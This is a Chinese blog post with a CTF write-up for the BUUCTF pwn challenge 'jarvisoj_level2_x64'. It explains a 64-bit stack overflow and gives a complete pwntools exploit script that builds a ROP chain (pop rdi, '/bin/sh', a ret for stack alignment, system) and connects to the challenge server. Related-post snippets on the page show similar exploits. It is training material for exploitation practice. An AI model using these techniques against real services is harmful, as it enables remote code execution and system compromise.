【BUUCTF】jarvisoj_level2_x64 Write Up

最新推荐文章于 2024-06-23 01:01:15 发布
最新推荐文章于 2024-06-23 01:01:15 发布
阅读量623 收藏
点赞数
分类专栏: BUUCTF - PWN 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/107844902
版权



漏洞函数里面可以看到,我们可以栈溢出

题目使用了system函数,我们可以直接调用

程序里面藏了一个binsh

接下来只需要构造rop链了

64位的函数调用的第一个参数由rdi寄存器传递,很显然需要用到pop rdi这个gadget,并且几乎每个64位程序里面都能找到它

再需要注意的就是,system调用的时候需要栈对齐,这里采用一个ret来对齐栈

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',26048)
#io=process('./level2_x64')
elf=ELF('./level2_x64')

ra()
sl('a'*0x88+p64(elf.search(asm('pop rdi\nret')).next())+p64(0x600a90)+p64(elf.search(asm('ret')).next())+p64(elf.plt['system']))

io.interactive()
古月浪子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
uTinyRipper_x64 (2)_uTinyRipper_x64_
10-01
《uTinyRipper_x64:Unity资源提取利器详解》 在数字娱乐产业中,Unity引擎因其强大的功能和易用性,已经成为许多开发者首选的游戏开发工具。然而,有时我们可能需要从Unity游戏或应用程序中提取资源,如模型、纹理...
451687.zip_2 level inverter_model discrete
07-14
Level 2 SV modulation inverter discrete model, matlab6, 5 of simulink,
BUUCTF jarvisoj_level2
、moddemod
06-12 539
exp from pwn import * context(log_level = 'debug') proc_name = './level2' p = process(proc_name) # p = remote('node3.buuoj.cn', 26643) elf = ELF(proc_name) system_addr = elf.sym['system'] main_addr = elf.sym['main'] bin_sh_str = 0x0804a024 payload = 'a'..
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 393
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
jarvisoj_level2
最新发布
Nike_name的博客
06-23 349
栈溢出构造(函数)从而得到shell
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 814
[BUUCTF-pwn]——jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
[BUUCTF]PWN——jarvisoj_level2_x64
BangSen1的博客
03-30 1346
jarvisoj_level2_x64 例行检查 ,64位,开启NX保护, 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 493
[buuctf]jarvisoj_level2
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
get.rar_gac_level set_level set function
07-15
标题中的“get.rar_gac_level set set function”指的是一个与通用自动分类(GAC,Generalized Active Contours)相关的程序或代码集,其中涉及到水平集(level set)函数的设置和调整。GAC是一种图像分割算法,它...
rw.rar_Level set Matlab_level set_level-set
09-14
2. **速度函数**:定义界面移动的速度场V(x, y, z),它是影响界面演化的关键因素。速度函数可以根据图像特征(如灰度值、边缘强度等)来确定,确保界面向正确的方向移动。 3. **Euler演化**:应用Euler方法更新水平...
[BUUCTF]PWN16——jarvisoj_level2
mcmuyanga的博客
09-01 2058
[BUUCTF]PWN16——jarvisoj_level2 附件 步骤 例行检查,32位,开启了nx保护 试运行一下程序 32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串 双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置, shell_addr=0x804a024 system_addr=0x8048320 我们可以直接利用这些构造 system(/bin/sh)去执行 跟进试运行时候看到的字
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 695
jarvisoj_level2【BUUCTF
BUUCTF - PWN】jarvisoj_level2
古月浪子的博客
04-05 660
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
buuctf jarvisoj_level2
carol2358的博客
04-19 290
水题 可以在ida里找到system和/bin/sh(alt+t) 然后构造payload就完事了 from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux' ) r = remote('node3.buuoj.cn', 28847) #r = proc...
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 448
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
BUUCTF-Pwn-jarvisoj_level2
餐桌上的猫
02-15 2329
题目截图 检查文件信息,开启了NX 用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用 查看函数表存在system函数 进入主函数反汇编查看 进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshell exp from pwn import* r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024 call_system=0x8048
[BUUCTF-pwn]——jarvisoj_level2_x64
Y_peak的博客
02-11 349
[BUUCTF-pwn]——jarvisoj_level2_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64 checksec 一下,64位 ,开启NX保护 64位应该会用到pop rdi这个汇编指令 在IDA中看看 思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数 exploit from pwn import * p = remote("node3.buuoj.cn",27828) b
[BUUCTF]PWN------jarvisoj_level2
BangSen1的博客
01-20 312
jarvisoj_level2 例行检查,32bit,开启NX保护。 nc 一下 ,Hello world,没什么信息 用32位IDA打开,看到了/bin/sh,跟进一下。 想查看调用函数的,但是看不了,所幸地址已经给出,所以shell_addr=0x804A024 system_addr=0x8048320 直接利用这些构造 system(/bin/sh)去执行 找到输入点 buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop exp flag ...
buuctf pwn
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。而ret2system是一种漏洞利用技术,通过修改返回地址为system函数的地址,来实现执行系统命令的目的。ret2text是一种类似的漏洞利用技术,通过修改返回地址为.text段中的某个特定地址,来实现执行指定代码的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值